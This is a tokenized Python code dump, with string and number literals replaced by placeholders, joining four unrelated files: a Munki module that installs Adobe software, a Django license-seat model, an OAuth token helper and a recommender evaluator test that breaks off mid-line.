<EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> installroot = mountpoints [ <NUM_LIT:0> ] <EOL> if uninstalling : <EOL> ubertool = os . path . join ( installroot , pkgname , <EOL> "<STR_LIT>" ) <EOL> else : <EOL> ubertool = os . path . join ( installroot , pkgname , <EOL> "<STR_LIT>" ) <EOL> if os . path . exists ( ubertool ) : <EOL> info = getAdobePackageInfo ( installroot ) <EOL> packagename = info [ '<STR_LIT>' ] <EOL> action = "<STR_LIT>" <EOL> operation = "<STR_LIT>" <EOL> if uninstalling : <EOL> action = "<STR_LIT>" <EOL> operation = "<STR_LIT>" <EOL> munkicommon . display_status_major ( '<STR_LIT>' % ( action , packagename ) ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . detail ( '<STR_LIT>' % os . path . basename ( ubertool ) ) <EOL> number_of_payloads = countPayloads ( installroot ) <EOL> retcode = runAdobeInstallTool ( <EOL> [ ubertool ] , number_of_payloads , killAdobeAIR = True , <EOL> payloads = payloads , kind = '<STR_LIT>' , operation = operation ) <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % ubertool ) <EOL> retcode = - <NUM_LIT:1> <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return retcode <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> def findAcrobatPatchApp ( dirpath ) : <EOL> '''<STR_LIT>''' <EOL> for ( path , dummy_dirs , dummy_files ) in os . walk ( dirpath ) : <EOL> if path . endswith ( "<STR_LIT>" ) : <EOL> patch_script_path = os . path . join ( <EOL> path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . exists ( patch_script_path ) : <EOL> return path <EOL> return '<STR_LIT>' <EOL> def updateAcrobatPro ( dmgpath ) : <EOL> """<STR_LIT>""" <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( - <NUM_LIT:1> ) <EOL> munkicommon . display_status_minor ( <EOL> '<STR_LIT>' % os . path . basename ( dmgpath ) ) <EOL> mountpoints = mountAdobeDmg ( dmgpath ) <EOL> if mountpoints : <EOL> installroot = mountpoints [ <NUM_LIT:0> ] <EOL> pathToAcrobatPatchApp = findAcrobatPatchApp ( installroot ) <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" % dmgpath ) <EOL> return - <NUM_LIT:1> <EOL> if not pathToAcrobatPatchApp : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , pathToAcrobatPatchApp ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> resourcesDir = os . path . join ( <EOL> pathToAcrobatPatchApp , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ApplyOperation = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> callingScriptPath = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> appList = [ ] <EOL> appListFile = os . path . join ( resourcesDir , '<STR_LIT>' ) <EOL> if os . path . exists ( appListFile ) : <EOL> fileobj = open ( appListFile , mode = '<STR_LIT:r>' , buffering = - <NUM_LIT:1> ) <EOL> if fileobj : <EOL> for line in fileobj . readlines ( ) : <EOL> appList . append ( line ) <EOL> fileobj . close ( ) <EOL> if not appList : <EOL> munkicommon . display_error ( '<STR_LIT>' ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> payloadNum = - <NUM_LIT:1> <EOL> for line in appList : <EOL> payloadNum = payloadNum + <NUM_LIT:1> <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( getPercent ( payloadNum + <NUM_LIT:1> , len ( appList ) + <NUM_LIT:1> ) ) <EOL> ( appname , status ) = line . split ( "<STR_LIT:\t>" ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' % appname ) <EOL> pathname = os . path . join ( "<STR_LIT>" , appname ) <EOL> if os . path . exists ( pathname ) : <EOL> item = { } <EOL> item [ '<STR_LIT:path>' ] = pathname <EOL> candidates = [ item ] <EOL> else : <EOL> candidates = [ item for item in munkicommon . getAppData ( ) <EOL> if item [ '<STR_LIT:path>' ] . endswith ( '<STR_LIT:/>' + appname ) ] <EOL> if len ( candidates ) == <NUM_LIT:0> : <EOL> if status == "<STR_LIT>" : <EOL> continue <EOL> else : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % appname ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> if len ( candidates ) > <NUM_LIT:1> : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % appname ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return - <NUM_LIT:1> <EOL> munkicommon . display_status_minor ( '<STR_LIT>' % appname ) <EOL> apppath = os . path . dirname ( candidates [ <NUM_LIT:0> ] [ "<STR_LIT:path>" ] ) <EOL> cmd = [ ApplyOperation , apppath , appname , resourcesDir , <EOL> callingScriptPath , str ( payloadNum ) ] <EOL> proc = subprocess . Popen ( cmd , shell = False , bufsize = - <NUM_LIT:1> , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . STDOUT ) <EOL> while proc . poll ( ) == None : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> retcode = proc . poll ( ) <EOL> if retcode != <NUM_LIT:0> : <EOL> munkicommon . display_error ( <EOL> '<STR_LIT>' , appname , retcode ) <EOL> break <EOL> else : <EOL> munkicommon . display_status_minor ( '<STR_LIT>' , appname ) <EOL> munkicommon . display_status_minor ( '<STR_LIT>' ) <EOL> if munkicommon . munkistatusoutput : <EOL> munkistatus . percent ( <NUM_LIT:100> ) <EOL> munkicommon . unmountdmg ( installroot ) <EOL> return retcode <EOL> def getBundleInfo ( path ) : <EOL> """<STR_LIT>""" <EOL> infopath = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if not os . path . exists ( infopath ) : <EOL> infopath = os . path . join ( path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if os . path . exists ( infopath ) : <EOL> try : <EOL> plist = FoundationPlist . readPlist ( infopath ) <EOL> return plist <EOL> except FoundationPlist . NSPropertyListSerializationException : <EOL> pass <EOL> return None <EOL> def getAdobeInstallInfo ( installdir ) : <EOL> '''<STR_LIT>''' <EOL> adobeInstallInfo = { } <EOL> if installdir : <EOL> adobeInstallInfo [ '<STR_LIT>' ] = getCS5mediaSignature ( installdir ) <EOL> adobeInstallInfo [ '<STR_LIT>' ] = countPayloads ( installdir ) <EOL> optionXMLfile = os . path . join ( installdir , "<STR_LIT>" ) <EOL> if os . path . exists ( optionXMLfile ) : <EOL> adobeInstallInfo [ '<STR_LIT>' ] = getCS5uninstallXML ( optionXMLfile ) <EOL> return adobeInstallInfo <EOL> def getAdobeCatalogInfo ( mountpoint , pkgname = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> deploymentmanager = findAdobeDeploymentManager ( mountpoint ) <EOL> if deploymentmanager : <EOL> dirpath = os . path . dirname ( deploymentmanager ) <EOL> option_xml_file = os . path . join ( dirpath , '<STR_LIT>' ) <EOL> option_xml_info = { } <EOL> if os . path . exists ( option_xml_file ) : <EOL> option_xml_info = parseOptionXML ( option_xml_file ) <EOL> cataloginfo = getAdobePackageInfo ( dirpath ) <EOL> if cataloginfo : <EOL> if option_xml_info . get ( '<STR_LIT>' ) == u'<STR_LIT>' : <EOL> cataloginfo [ '<STR_LIT>' ] = option_xml_info . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( <EOL> '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> mediasignatures = [ <EOL> item [ '<STR_LIT>' ] <EOL> for item in option_xml_info . get ( '<STR_LIT>' , [ ] ) <EOL> if '<STR_LIT>' in item ] <EOL> else : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( <EOL> '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = getAdobeInstallInfo ( <EOL> installdir = dirpath ) <EOL> mediasignature = cataloginfo [ '<STR_LIT>' ] . get ( <EOL> "<STR_LIT>" ) <EOL> mediasignatures = [ mediasignature ] <EOL> if mediasignatures : <EOL> uninstalldir = "<STR_LIT>" <EOL> installs = [ ] <EOL> for mediasignature in mediasignatures : <EOL> signaturefile = mediasignature + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , signaturefile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . append ( installitem ) <EOL> cataloginfo [ '<STR_LIT>' ] = installs <EOL> return cataloginfo <EOL> installapp = findInstallApp ( mountpoint ) <EOL> if installapp : <EOL> cataloginfo = { } <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> return cataloginfo <EOL> installapp = findAdobePatchInstallerApp ( mountpoint ) <EOL> if os . path . exists ( installapp ) : <EOL> cataloginfo = getAdobePackageInfo ( mountpoint ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if pkgname : <EOL> cataloginfo [ '<STR_LIT>' ] = pkgname <EOL> installs = [ ] <EOL> uninstalldir = "<STR_LIT>" <EOL> for payload in cataloginfo . get ( '<STR_LIT>' , [ ] ) : <EOL> if ( payload . get ( '<STR_LIT>' , '<STR_LIT>' ) == <EOL> cataloginfo [ '<STR_LIT>' ] ) : <EOL> if '<STR_LIT>' in payload : <EOL> dbfile = payload [ '<STR_LIT>' ] + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , dbfile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . append ( installitem ) <EOL> break <EOL> if installs == [ ] : <EOL> for payload in cataloginfo . get ( '<STR_LIT>' , [ ] ) : <EOL> if '<STR_LIT>' in payload : <EOL> if ( "<STR_LIT>" in payload . get ( "<STR_LIT>" ) or <EOL> "<STR_LIT>" in payload . get ( <EOL> "<STR_LIT>" ) ) : <EOL> continue <EOL> dbfile = payload [ '<STR_LIT>' ] + "<STR_LIT>" <EOL> filepath = os . path . join ( uninstalldir , dbfile ) <EOL> installitem = { } <EOL> installitem [ '<STR_LIT:path>' ] = filepath <EOL> installitem [ '<STR_LIT:type>' ] = '<STR_LIT:file>' <EOL> installs . append ( installitem ) <EOL> cataloginfo [ '<STR_LIT>' ] = installs <EOL> return cataloginfo <EOL> pkgroot = os . path . join ( mountpoint , pkgname ) <EOL> adobeinstallxml = os . path . join ( pkgroot , "<STR_LIT>" ) <EOL> if os . path . exists ( adobeinstallxml ) : <EOL> cataloginfo = getAdobePackageInfo ( pkgroot ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if pkgname : <EOL> cataloginfo [ '<STR_LIT>' ] = pkgname <EOL> return cataloginfo <EOL> setuppath = findSetupApp ( mountpoint ) <EOL> if setuppath : <EOL> cataloginfo = getAdobeSetupInfo ( mountpoint ) <EOL> if cataloginfo : <EOL> cataloginfo [ '<STR_LIT:name>' ] = cataloginfo [ '<STR_LIT>' ] . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> if cataloginfo . get ( '<STR_LIT>' ) == "<STR_LIT>" : <EOL> cataloginfo [ '<STR_LIT>' ] = True <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> cataloginfo [ '<STR_LIT:description>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> cataloginfo [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> return cataloginfo <EOL> acrobatpatcherapp = findAcrobatPatchApp ( mountpoint ) <EOL> if acrobatpatcherapp : <EOL> cataloginfo = { } <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = False <EOL> plist = getBundleInfo ( acrobatpatcherapp ) <EOL> cataloginfo [ '<STR_LIT:version>' ] = munkicommon . getVersionString ( plist ) <EOL> cataloginfo [ '<STR_LIT:name>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> cataloginfo [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> cataloginfo [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cataloginfo [ '<STR_LIT>' ] = [ ] <EOL> cataloginfo [ '<STR_LIT>' ] = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cataloginfo [ '<STR_LIT:version>' ] , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' } <EOL> ] <EOL> return cataloginfo <EOL> return None <EOL> def adobeSetupError ( errorcode ) : <EOL> '''<STR_LIT>''' <EOL> errormessage = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:15> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:30> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:32> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> - <NUM_LIT:1> : "<STR_LIT>" } <EOL> return errormessage . get ( errorcode , "<STR_LIT>" ) <EOL> def doAdobeRemoval ( item ) : <EOL> '''<STR_LIT>''' <EOL> uninstallmethod = item [ '<STR_LIT>' ] <EOL> payloads = item . get ( "<STR_LIT>" ) <EOL> itempath = "<STR_LIT>" <EOL> if "<STR_LIT>" in item : <EOL> managedinstallbase = munkicommon . pref ( '<STR_LIT>' ) <EOL> itempath = os . path . join ( managedinstallbase , '<STR_LIT>' , <EOL> item [ "<STR_LIT>" ] ) <EOL> if not os . path . exists ( itempath ) : <EOL> munkicommon . display_error ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( uninstallmethod , item [ '<STR_LIT:name>' ] ) ) <EOL> return - <NUM_LIT:1> <EOL> if uninstallmethod == "<STR_LIT>" : <EOL> retcode = runAdobeSetup ( itempath , uninstalling = True , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> pkgname = item . get ( "<STR_LIT>" ) or item . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> retcode = runAdobeUberTool ( <EOL> itempath , pkgname , uninstalling = True , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> adobeInstallInfo = item . get ( '<STR_LIT>' ) <EOL> retcode = doAdobeCS5Uninstall ( adobeInstallInfo , payloads = payloads ) <EOL> elif uninstallmethod == "<STR_LIT>" : <EOL> retcode = runAdobeCCPpkgScript ( <EOL> itempath , payloads = payloads , operation = "<STR_LIT>" ) <EOL> if retcode : <EOL> munkicommon . display_error ( "<STR_LIT>" , item [ '<STR_LIT:name>' ] ) <EOL> return retcode <EOL> def doAdobeInstall ( item ) : <EOL> '''<STR_LIT>''' <EOL> managedinstallbase = munkicommon . pref ( '<STR_LIT>' ) <EOL> itempath = os . path . join ( <EOL> managedinstallbase , '<STR_LIT>' , item [ '<STR_LIT>' ] ) <EOL> installer_type = item . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> payloads = item . get ( "<STR_LIT>" ) <EOL> if installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeSetup ( itempath , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> pkgname = item . get ( "<STR_LIT>" ) or item . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> retcode = runAdobeUberTool ( itempath , pkgname , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = updateAcrobatPro ( itempath ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCS5AAMEEInstall ( itempath , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCS5PatchInstaller ( <EOL> itempath , copylocal = item . get ( "<STR_LIT>" ) , payloads = payloads ) <EOL> elif installer_type == "<STR_LIT>" : <EOL> retcode = runAdobeCCPpkgScript ( itempath , payloads = payloads ) <EOL> return retcode <EOL> def main ( ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from django . db import models <EOL> from inventory . models import InventoryItem <EOL> from urllib import quote_plus <EOL> class License ( models . Model ) : <EOL> item_name = models . CharField ( max_length = <NUM_LIT:64> , unique = True , primary_key = True ) <EOL> total = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> cost_per_seat = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> inventory_name = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_version = models . CharField ( max_length = <NUM_LIT:32> , blank = True ) <EOL> inventory_bundleid = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_bundlename = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> inventory_path = models . CharField ( max_length = <NUM_LIT> , blank = True ) <EOL> notes = models . TextField ( blank = True ) <EOL> def used ( self ) : <EOL> items = InventoryItem . objects . all ( ) <EOL> if self . inventory_name : <EOL> items = items . filter ( name__exact = self . inventory_name ) <EOL> if self . inventory_version : <EOL> if self . inventory_version . endswith ( '<STR_LIT:*>' ) : <EOL> items = items . filter ( <EOL> version__startswith = self . inventory_version [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) <EOL> else : <EOL> items = items . filter ( version__exact = self . inventory_version ) <EOL> if self . inventory_bundleid : <EOL> items = items . filter ( bundleid__exact = self . inventory_bundleid ) <EOL> if self . inventory_bundlename : <EOL> items = items . filter ( <EOL> bundlename__exact = self . inventory_bundlename ) <EOL> if self . inventory_path : <EOL> items = items . filter ( path__exact = self . inventory_path ) <EOL> return items . values ( '<STR_LIT>' ) . distinct ( ) . count ( ) <EOL> def inventory_query_string ( self ) : <EOL> '''<STR_LIT>''' <EOL> parts = [ ] <EOL> if self . inventory_name : <EOL> parts . append ( "<STR_LIT>" % self . inventory_name ) <EOL> if self . inventory_version : <EOL> parts . append ( "<STR_LIT>" % self . inventory_version ) <EOL> if self . inventory_bundleid : <EOL> parts . append ( "<STR_LIT>" % self . inventory_bundleid ) <EOL> if self . inventory_bundlename : <EOL> parts . append ( "<STR_LIT>" % self . inventory_bundlename ) <EOL> if self . inventory_path : <EOL> parts . append ( "<STR_LIT>" % self . inventory_path ) <EOL> if parts : <EOL> return quote_plus ( '<STR_LIT>' % '<STR_LIT:&>' . join ( parts ) , safe = '<STR_LIT>' ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def available ( self ) : <EOL> return self . total - self . used ( ) <EOL> class Meta : <EOL> ordering = [ '<STR_LIT>' ] </s>
<s> import oauth_local <EOL> import oauth_installed <EOL> import oauth_gce <EOL> import sys <EOL> import datetime <EOL> import http <EOL> import json <EOL> import oauth_base <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def resolve ( t ) : <EOL> if t == '<STR_LIT>' : <EOL> return oauth_installed <EOL> elif t == '<STR_LIT>' : <EOL> return oauth_local <EOL> elif t == '<STR_LIT>' : <EOL> return oauth_gce <EOL> raise Error ( '<STR_LIT>' % ( t ) ) <EOL> def get_token ( ) : <EOL> auth = oauth_base . read_file ( ) <EOL> if not auth : <EOL> raise Error ( '<STR_LIT>' ) <EOL> now = int ( datetime . datetime . now ( ) . strftime ( "<STR_LIT:%s>" ) ) <EOL> handler = resolve ( auth [ '<STR_LIT>' ] ) <EOL> if now > auth [ '<STR_LIT>' ] - <NUM_LIT> : <EOL> handler . refresh_token ( auth ) <EOL> auth = oauth_base . read_file ( ) <EOL> if not auth : <EOL> raise Error ( '<STR_LIT>' ) <EOL> return auth [ '<STR_LIT>' ] <EOL> def oauth_req_json ( method , url , params = None , headers = { } , expects = [ <NUM_LIT:200> ] ) : <EOL> return oauth_async_req_json ( method , url , params , headers , expects ) . resp ( ) <EOL> def oauth_async_req_json ( method , url , params = None , headers = { } , expects = [ <NUM_LIT:200> ] ) : <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' % get_token ( ) <EOL> if params : <EOL> params = json . dumps ( params ) <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return http . async_req_json ( method , url , params , headers , expects ) <EOL> def argparse_prepare ( sub ) : <EOL> """<STR_LIT>""" <EOL> def argparse_exec ( args ) : <EOL> print get_token ( ) <EOL> def __main ( ) : <EOL> print get_token ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> __main ( ) </s>
<s> from nose . tools import assert_equals , assert_almost_equals , assert_raises , assert_true <EOL> from ... similarities . basic_similarities import UserSimilarity <EOL> from ... metrics . pairwise import euclidean_distances , jaccard_coefficient <EOL> from ... models . classes import MatrixPreferenceDataModel , MatrixBooleanPrefDataModel <EOL> from ... recommenders . knn import UserBasedRecommender <EOL> from . . classes import CfEvaluator <EOL> from ... recommenders . knn . neighborhood_strategies import NearestNeighborsStrategy <EOL> movies = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:1.0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> '<STR_LIT>' : { } } <EOL> model = MatrixPreferenceDataModel ( movies ) <EOL> boolean_model = MatrixBooleanPrefDataModel ( movies ) <EOL> similarity = UserSimilarity ( model , euclidean_distances ) <EOL> boolean_similarity = UserSimilarity ( boolean_model , jaccard_coefficient ) <EOL> neighborhood = NearestNeighborsStrategy ( ) <EOL> recsys = UserBasedRecommender ( model , similarity , neighborhood ) <EOL> boolean_recsys = UserBasedRecommender ( boolean_model , boolean_similarity , neighborhood ) <EOL> def test_root_CfEvaluator_evaluate ( ) : <EOL> """<STR_LIT>""" <EOL> evaluator = CfEvaluator ( ) <EOL> assert_raises ( ValueError , evaluator . evaluate , recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( rmse [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and rmse [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> mae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( mae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and mae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> precision = evaluator . evaluate ( recsys , '<STR_LIT>' , <EOL> permutation = False ) <EOL> assert_true ( precision [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and precision [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> recall = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( recall [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and recall [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> f1score = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( f1score [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and f1score [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> all_scores = evaluator . evaluate ( recsys , permutation = False ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_true ( all_scores [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and all_scores [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> nmae = evaluator . evaluate ( recsys , '<STR_LIT>' , permutation = False , <EOL> sampling_users = <NUM_LIT> , sampling_ratings = <NUM_LIT> ) <EOL> assert_true ( nmae [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and nmae [ '<STR_LIT>' ] <= <NUM_LIT:1.0> ) <EOL> assert_raises ( ValueError , evaluator . evaluate , boolean_recsys , '<STR_LIT>' ) <EOL> rmse = evaluator . evaluate ( boolean_recsys , '<STR_LIT>' , permutation = False ) <EOL> assert_true ( rmse [ '<STR_LIT>' ] >= <NUM_LIT:0.0> and rmse [ '<STR_LIT>' ] <= 